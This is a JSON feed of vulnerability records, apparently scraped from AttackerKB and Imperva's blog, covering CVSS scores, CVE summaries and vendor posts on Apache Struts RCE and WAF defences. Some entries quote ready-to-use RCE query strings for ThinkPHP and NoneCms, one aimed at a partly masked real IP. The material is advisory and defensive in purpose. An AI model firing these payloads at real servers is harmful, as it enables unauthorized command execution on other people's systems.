"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-12-10T00:00:00", "type": "attackerkb", "title": "CVE-2018-1000861", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000861"], "modified": "2023-10-06T00:00:00", "id": "AKB:CF786BB6-FE33-44E5-A228-09F3AF0A9BDF", "href": "https://attackerkb.com/topics/7QecWDLgpk/cve-2018-1000861", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:42:39", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**elligottmc** at October 29, 2020 2:27pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\n**ccondon-r7** at November 01, 2020 4:19pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\n**lvarela-r7** at October 29, 2020 12:41pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "attackerkb", "title": "CVE-2020-14882 \u2014 Unauthenticated RCE in Console component of Oracle WebLogic Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-2555", "CVE-2021-26084"], "modified": "2020-12-28T00:00:00", "id": "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "href": "https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:42:27", "description": "An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\\think\\Request/input&filter=phpinfo&data=1 query string.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-12-11T00:00:00", "type": "attackerkb", "title": "CVE-2018-20062", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-20062"], "modified": "2023-10-06T00:00:00", "id": "AKB:63D693EA-4871-437C-A21E-2D78757ACEA7", "href": "https://attackerkb.com/topics/S10TE99uyN/cve-2018-20062", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:37:04", "description": "The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application\u2019s GET handler by using a different method.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2010-04-28T00:00:00", "type": "attackerkb", "title": "CVE-2010-0738", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0738"], "modified": "2023-10-04T00:00:00", "id": "AKB:19837D50-02C3-4ED0-8BAB-002F18DFF473", "href": "https://attackerkb.com/topics/Hd2naU2Dub/cve-2010-0738", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-10-18T16:42:36", "description": "ThinkPHP before 3.2.4, as used in Open Source BMS v1.1.1 and other products, allows Remote Command Execution via public//?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command.\n\n \n**Recent assessments:** \n \n**Mad-robot** at July 05, 2020 1:53pm UTC reported:\n\n**ThinkPHP RCE**\n\n**DESCRIPTION**\n\nThinkPHP before 3.2.4, as used in Open Source BMS v1.1.1 and other products, allows Remote Command Execution via public//?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command.\n\n**PROOF OF CONCEPT** \nThe RCE(Remote Command Execution) vulnerability is triggered by a http request.Successfully executed the command \u201cwhoami\u201d. \npoc:\n \n \n http://58.82.XXX.XXX:8080/public//?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami\n \n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-02-24T00:00:00", "type": "attackerkb", "title": "CVE-2019-9082", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9082"], "modified": "2023-10-06T00:00:00", "id": "AKB:EA640ECF-7004-4162-AC75-C0BB62190E7F", "href": "https://attackerkb.com/topics/nBAWl0YekR/cve-2019-9082", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2017-12-25T19:52:24", "description": "I recently took a step back to review all the content we shared in 2017 on the Imperva blog. We covered a broad range of topics including data security, cloud migration, application and API security, AI and machine learning, cybersecurity research, GDPR, insider threats and more. We were busy! Cybersecurity certainly held the world's attention in 2017.\n\nSeveral stories rose to the top as either most read by you, particularly relevant to today's cybersecurity industry or exceptionally newsworthy (and in some cases, all of the above). For an end-of-year reading shortlist, I've compiled our top 10 blog posts from 2017.\n\n## 1\\. What\u2019s Next for Ransomware: Data Corruption, Exfiltration and Disruption\n\nThe WannaCry ransomware attack caught everyone off guard, infecting more than 230,000 computers in 150 countries by encrypting data on networked machines and demanding payments in Bitcoin. We wrote about how to [protect against it](<https://www.imperva.com/blog/2017/05/protect-against-wannacry-with-deception-based-ransomware-detection/>), but our post on [what's next for ransomware](<https://www.imperva.com/blog/2017/05/whats-next-for-ransomware/>) garnered even more attention\u2014it was our most read post of the year.\n\n## 2\\. CVE-2017-5638: Remote Code Execution (RCE) Vulnerability in Apache Struts\n\nApache Struts made headlines all over the place in 2017. The [vulnerability we wrote about in March](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) hit it big and just kept on going. You might remember it reared its ugly head later in the year when it was tied to the Equifax breach. (We also wrote about two other Apache Struts vulnerabilities: [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>) and [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>).)\n\n## 3\\. Top Insider Threat Concern? Careless Users. [Survey]\n\nWe [surveyed 310 IT security professionals](<https://www.imperva.com/blog/2017/07/top-insider-threat-concern-careless-users-survey/>) at [Infosecurity Europe](<http://www.infosecurityeurope.com/>) in June on their thoughts on insider threats. The big reveal? More than half (59 percent) were concerned not primarily about malicious users, but about the careless ones who unwittingly put their organization\u2019s data at risk. (We shared more about insider threats in this [infographic](<https://www.imperva.com/blog/2017/05/thwart-insider-threats-with-machine-learning-infographic/>).)\n\n## 4\\. Uncover Sensitive Data with the Classifier Tool\n\nIn July we launched Classifier, a free data classification tool that allows organizations to quickly uncover sensitive data in their databases. The response was immediate\u2014over 500 [downloads ](<https://www.imperva.com/lg/lgw_trial.asp?pid=582>)and counting\u2014not surprising given it helps jump start the path to compliance with the GDPR. [Our blog post ](<https://www.imperva.com/blog/2017/07/uncover-sensitive-data-with-the-classifier-tool/>)walked through the steps of how to use the tool.\n\n## 5\\. Professional Services for GDPR Compliance\n\nSpeaking of the GDPR, the new data protection regulation coming out of the EU was on everyone's radar this year. We wrote a LOT about GDPR, including [who is subject to the regulation](<https://www.imperva.com/blog/2017/02/gdpr-series-part-1-gdpr-apply/>), [what rules require data protection technology](<https://www.imperva.com/blog/2017/03/gdpr-series-part-2-rules-require-data-protection-technology/?utm_source=socialmedia&utm_medium=organic_empshare&utm_campaign=2017_Q1_GDPRPart2>), and the [penalties for non-compliance.](<https://www.imperva.com/blog/2017/03/gdpr-series-part-4-penalties-non-compliance/>) However, our post on the [professional services we offer for GDPR compliance](<https://www.imperva.com/blog/2017/10/professional-services-for-gdpr-compliance/>) drove the most traffic on this topic by far.\n\n## 6\\. The Evolution of Cybercrime and What It Means for Data Security\n\nHackers tactics may change, but what they\u2019re after doesn\u2019t\u2014your data. Stealing or obstructing access to enterprise data is the foundation of the cybercrime value chain. We discussed how the [changing nature of cybercrime](<https://www.imperva.com/blog/2017/06/the-evolution-of-cybercrime-and-what-it-means-for-data-security/>) and app and data accessibility create risk and the essentials of application and data protection in this ever-changing world.\n\n## 7\\. Move Securely to the Cloud: WAF Requirements and Deployment Options\n\nMoving to the cloud has become an overwhelmingly popular trend even among those who were at first reluctant to make the move. In this post, we discussed [requirements and deployment options for evaluating a WAF for the cloud](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). (We also wrote about the [benefits of a hybrid WAF deployment ](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>)and the pros and cons of both cloud and on-prem WAFs.)\n\n## 8\\. Clustering and Dimensionality Reduction: Understanding the \u201cMagic\u201d Behind Machine Learning\n\nEverywhere you turned in 2017 you heard about AI and machine learning and the impact they're having, or will have, on essentially everything. Two of Imperva's top cybersecurity researchers explained in detail [some of the techniques used in machine learning](<https://www.imperva.com/blog/2017/07/clustering-and-dimensionality-reduction-understanding-the-magic-behind-machine-learning/>) and how they're applied to solve for identifying improper access to unstructured data. (Those two researchers were also awarded a patent for their machine learning work this year!)\n\n## 9\\. Can a License Solve Your Cloud Migration Problem?\n\nGartner published their [2017 Magic Quadrant for Web Application Firewalls ](<https://www.imperva.com/blog/2017/08/gartner-magic-quadrant-for-wafs-a-leader-four-consecutive-years/>)(WAF) in August and Imperva was once again named a WAF leader, making it four consecutive years. We stood out for offering security solutions for today's changing deployment and infrastructure model. [In this post](<https://www.imperva.com/blog/2017/11/license-solve-cloud-migration-problem/>) we wrote about our flexible licensing program, which lies at the core of the move to the cloud: helping customers secure apps wherever they need, whenever they need, for one price.\n\n## 10\\. The Uber Breach and the Case for Data Masking\n\nLast but not least, we couldn't ignore the Uber breach. Hard to believe in today's world that log in credentials were shared in a public, unsecured forum, but that's what happened. The breach did highlight an important issue, that of production data being used in development environments. It's a bad idea; [we explained why in this post](<https://www.imperva.com/blog/2017/11/uber-breach-case-data-masking/>). Had data masking been used at Uber, hackers would have been left with worthless data, or as we called it, digital fools gold.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-12-18T17:43:16", "type": "impervablog", "title": "Imperva\u2019s Top 10 Blogs of 2017", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805"], "modified": "2017-12-18T17:43:16", "id": "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "href": "https://www.imperva.com/blog/2017/12/impervas-top-10-blogs-of-2017/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-21T16:39:07", "description": "People used to argue about whether cyber security is a business problem or a technical problem. But this frames the issue poorly. \u201cProblem\u201d and \u201csolution\u201d imply that there is a definitive \u201csolve.\u201d\n\nCybercrime isn\u2019t a technical problem that can be definitively solved. It is an inherent business risk of having something of value. And risk can\u2019t be solved. Risk can only be managed.\n\nThe thing that differentiates cyber security from almost any other IT discipline (disaster recovery and business continuity in a post 9/11 world is another) is that with cyber security there is an adversary, and that adversary is motivated and incented to beat you. And if you have something of value to them, and if their reward outweighs their risk, they will continually evolve their tactics to get to it.\n\nBusiness-driven digital transformation is driving exponential growth in the number of knowledge workers, websites, mobile apps, APIs, file servers, databases, etc. Each of these enable our businesses to collect, generate and/or use data to competitive advantage.\n\nIn security parlance, this is known as \u201csurface area\u201d; that which is exposed to an attacker. Each is either an end target of the cybercriminal, or a vector a cybercriminal uses to get to data. The more our businesses digitize, the more surface area there will be. Most of this surface area (the big exception is people themselves) is manifested as technology.\n\n## What\u2019s this got to do with Apache Struts?\n\n[Apache Struts](<http://struts.apache.org/>) \u2013 and you\u2019d have to work hard to find something that initially seems more disconnected from business risk as Apache Struts \u2013 illustrates this.\n\nApache Struts is a framework that extends the Java Servlet API for writing web/mobile/API-based applications. Digital transformation means more apps. More apps mean more use of frameworks like Struts. Which means more technical surface area exposed to attackers. This illustrates why \u201cjust reduce surface area\u201d alone isn\u2019t a strategy. Less surface area means less apps, which would mean less digital transformation itself. Given the perceived cost and revenue-side business benefits of digital transformation, this is not likely to happen.\n\nStruts, and other similar frameworks, basically enable developers to write Java apps faster. Struts has been around, in one form or another, since 2000. The current framework \u2013 [Apache Struts 2](<https://en.wikipedia.org/wiki/Apache_Struts_2>) \u2013 was initially released in 2007. Some estimate it is used by 65 percent of the Fortune 500.\n\nOur [research team](<https://www.imperva.com/DefenseCenter>) \u2013 which is the same team that releases our WAF signatures/virtual patches for known vulnerabilities \u2013 collected the following stats on Struts:\n\n * 75 published security vulnerabilities to date\n * 83% of the vulnerabilities can be accessed via a remote attacker (i.e., via network)\n * 75% of the vulnerabilities have working exploits\n * 35% of the vulnerabilities may allow remote code execution (RCE) attacks\n\n### What is RCE?\n\n[RCE](<https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>) is nasty. IMHO, nastier than the more famous/infamous application vulnerability [SQL injection](<https://www.imperva.com/app-security/threatglossary/sql-injection/>). RCE, or remote code execution, allows an attacker to replace the parameters normally submitted as part of an API call with malicious code. Crafted carefully, this malicious code will then execute on the server. What this malicious code does is up to the attacker. Given that web apps frequently access back-end data stores, the potential for a RCE vulnerability to be exploited to breach data is apparent.\n\nIn 2017, there have been four different Apache Struts RCE vulnerabilities:\n\n * CVE-2017-12611\n * [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>)\n * [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>)\n * [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>)\n\nA close look at these shows several strategies for both reactively and proactively protecting application surface area. These certainly apply to Apache Struts, but also to most application frameworks.\n\n## Ways to Protect Application Surface Area\n\n### Patch Servers\n\nThe long-term fix for a vulnerability is to patch the servers. However, rolling out a patch across thousands of servers running hundreds of different apps owned by tens of different app teams is a not a trivial task. It can take months. Which is why most servers aren\u2019t at current patch levels.\n\nThere is another bit of nastiness around patching as well. Sometimes patches aren\u2019t backwards compatible. [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) contains this: _\u201cIt is possible that some REST actions stop working because of applied default restrictions on available classes.\u201d _In layman\u2019s terms, this means applying the patch can break an existing app. This gets to the heart of why security is risk management: deciding to apply a patch prior to testing a patch with all apps runs the risk of breaking the apps (a.k.a., \u201cpotentially bringing down a website\u201d).\n\n### Virtual Patching\n\nA virtual patch uses a gateway (WAF, IDS, network firewall) that monitors traffic to identify and block an attack before it reaches a web server. _Note, not all types of security gateways can apply a virtual patch to all types of vulnerabilities. _\n\nFor Struts CVE-2017-9805, Imperva used the [ThreatRadar](<https://www.imperva.com/Products/ThreatRadarSubscriptions>) Emergency Feed to distribute a signature and a corresponding virtual patch to SecureSphere Web Application Firewall users within 48 hours of the CVE\u2019s disclosure. Emergency Feed is an opt-in service that leverages the communication channel between SecureSphere and the Imperva cloud to automatically distribute signatures and associated policies to mitigate highly critical vulnerabilities. This in effect automatically deploys a virtual patch for the vulnerability. A policy accomplishing the same thing was uploaded to Incapsula in the same timeframe, accomplishing the same thing for any Incapsula WAF customers.\n\nVirtual patches for known CVEs are useful, but they are reactive. They are predicated upon knowing about a vulnerability in the first place. There is no (despite what some may say) general signature that spans all RCEs. The following are proactive defenses that can be used to protect against application vulnerabilities (RCE and otherwise).\n\n### Reputation-based Blocking\n\nThe vast majority of attacks launched against web app frameworks are automated. For example, for [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>), 40% of the attacks tracked by our research team originated from a single server in China. There is no reason for any traffic from any source like this to be reaching web servers. Imperva ThreatRadar IP Reputation can be set to fetch the latest IP Reputation feeds several times an hour. While this won\u2019t catch every instance of an attack, it is an excellent filter that will proactively block a large portion of the automated attacks that target web apps.\n\n### Anti-automation\n\nIP reputation isn\u2019t the only mechanism for stopping automated attacks. Both SecureSphere and Incapsula provide functionality for identifying and blocking bots, regardless of the bot\u2019s intent. Both use the same underlying technology to progressively profile a request to determine if the request is a human or a bot, and if a bot a good bot or a bad bot. Identifying and blocking requests from bad bots is another technique for scrubbing automated attacks targeting web apps.\n\n### Web Application Firewall Zero Day Protections\n\nReputation and anti-automation are extremely effective at filtering automated attacks from bad actors, but a careful attacker will be able to mask itself, especially when focusing upon a specific app or enterprise.\n\nHowever, to exploit an RCE vulnerability in every case the attacker needs to send the malicious code \u2013 the \u201cpayload\u201d \u2013 to the app in question. This payload will look wildly different from the typical content (e.g., an API call) submitted to an app. By learning what payloads are normally submitted via various form submissions and API calls, a solid WAF can prevent something like CVE-2017-9805 without knowing the vulnerability exists, and without ever seeing the payload before. The SecureSphere WAF uses machine learning to understand how an application normally behaves, and then uses it to identify and block anomalous requests.\n\nImperva zero day protections identified Apache Struts exploits almost immediately via a few different mechanisms:\n\n * Upon learning of a vulnerability, attackers will frequently \u201cspray and pray\u201d an attack against numerous apps, and various forms/APIs within an app. Given automation, its more cost effective for them to just broadly launch an attack than it is first determine if an app/API is even vulnerable. We saw this for CVE-2017-9805 almost immediately, identifying it a \u201cunknown content type for known URL\u201d. In English, this translates to \u201cnot only is this not normal, it isn\u2019t even content that this URL can process.\u201d These kinds of alerts are an early \u201ctell\u201d that something is afoot, and our research team uses them as both an early indicator, as well as to inform our ThreatRadar threat intelligence feeds.\n * If the app is susceptible to the vulnerability, a malicious payload will still not conform to normal application traffic. In the case of CVE-2017-9805, SecureSphere will identify an \u201cunknown parameter\u201d or \u201cparameter type violation.\u201d\n * In most cases, the payload is much larger/longer than a normal request. In these cases, a \u201cparameter length violation\u201d will surface.\n\n## The Role of App Security Domain Expertise\n\nWhat only someone who lives and breathes this stuff on a day-in/day-out basis knows is that any one of these violations by themselves isn\u2019t necessarily an attack. Policies built on evaluating any of this in isolation can result in a high rate of false positives. False positives are the bane of IT security\u2019s existence, _because when looking at a screen full of alerts, you don\u2019t know which ones are false and which aren\u2019t. _The net effect is ignoring them all.\n\nSecureSphere WAF has [patented capabilities](<https://www.imperva.com/Products/AdvancedTechnologies>) that evaluate the relationships between multiple violations. This ability to analyze seemingly independent violations coming from different layers of the app stack (e.g., network protocol, parameter length, IP reputation, etc.) together greatly enhances accuracy. This not only minimizes false positives, but more importantly provides the confidence to actually _block_ requests.\n\n## Manage Business Risk, Protect Against App Exploits\n\nAccording to the [2017 Verizon Data Breach Investigation Report](<http://www.verizonenterprise.com/verizon-insights-lab/dbir/2017/>) more successful breaches resulted from attacks on web apps than any other type of attack. This is telling since web app attacks are only number four in terms of incident frequency.\n\nAttackers realize that web app frameworks like Struts (and all frameworks have security issues) are particularly attractive targets. Since they are used for public facing web apps, they can\u2019t be hidden behind layers of network security. Their role is to accept inputs (web form parameters, API calls, etc.) and then process these inputs, which directly maps to particularly dangerous exploits like SQL injection and RCE. Since frameworks are widely adopted, attackers automate their attacks so they can cost effectively leverage their effort across thousands of websites.\n\nBusiness will roll out more application functionality. The cost savings and revenue generating opportunities from digital transformation pretty much guarantee we\u2019ll have more app surface area next year than this year. Learn more about how to use these capabilities to protect this ever growing surface area with Imperva SecureSphere [Web Application Firewall (WAF)](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>) and [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-09-18T20:33:25", "type": "impervablog", "title": "Apache Struts, RCE and Managing App Risk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805"], "modified": "2017-09-18T20:33:25", "id": "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "href": "https://www.imperva.com/blog/2017/09/apache-struts-rce-and-managing-app-risk/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-27T14:50:26", "description": "\n\n_(**Jan. 12 update: ** Due to a data transfer error, some of the 2017 figures were incorrectly reported; this version of the blog has been corrected. This error did not affect our 2018 statistics, nor our conclusions.)_\n\nAs a web application firewall provider, part of our job at Imperva is to continually monitor for new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrates it into a single repository, and assesses each vulnerability\u2019s priority. Having this kind of data puts us in a unique position to provide an analysis of all web application vulnerabilities throughout the year, view trends, and notice significant changes in the security landscape. As we did _[last year](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2017/>)_, we took a look back at 2018 to understand the changes and trends in web application security over the past year.\n\nThe bad news is that in 2018, like _[2017](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2017/>)_, we continued to see a **trend of increasing number of web application vulnerabilities**, particularly vulnerabilities related to _[injection](<https://www.owasp.org/index.php/Top_10-2017_A1-Injection>)_ such as _[SQL injection](<https://www.imperva.com/app-security/threatglossary/sql-injection/>)_, command injection, object injection, etc. On the content management system (CMS) front, **WordPress vulnerabilities continue to grow, **and they continue to dominate in terms of the number of vulnerabilities published in the CMS category. Although WordPress leads the pack in sheer vulnerabilities numbers, **Drupal ****vulnerabilities had a larger effect and were used in mass attacks **that targeted hundreds of thousands of sites during 2018. However, there is some good news for the security industry \u2014 the number of **Internet of Things (IoT) vulnerabilities declined**, as well as the number of vulnerabilities related to weak authentication. In the server side technologies category, the **number of PHP vulnerabilities continued to decline**. In addition, the **growth in API vulnerabilities also slightly declined**.\n\n## 2018 Web Application Vulnerabilities Statistics\n\nThe first phase in our yearly analysis was to check the amount of vulnerabilities published in 2018 in comparison to previous years. Figure 1 shows the number of vulnerabilities on a monthly basis over the last three years. We can see that the overall number of new vulnerabilities in 2018 (17,308) increased by 23% compared to 2017 (14,082) and by 162% compared to 2016 (6,615). According to our data, more than half of web application vulnerabilities (54%) have a public exploit available to hackers. In addition, more than a third (38%) of web application vulnerabilities don\u2019t have an available solution, such as a software upgrade workaround or software patch.\n\n \n\n \n_Figure 1: Number of web application vulnerabilities in 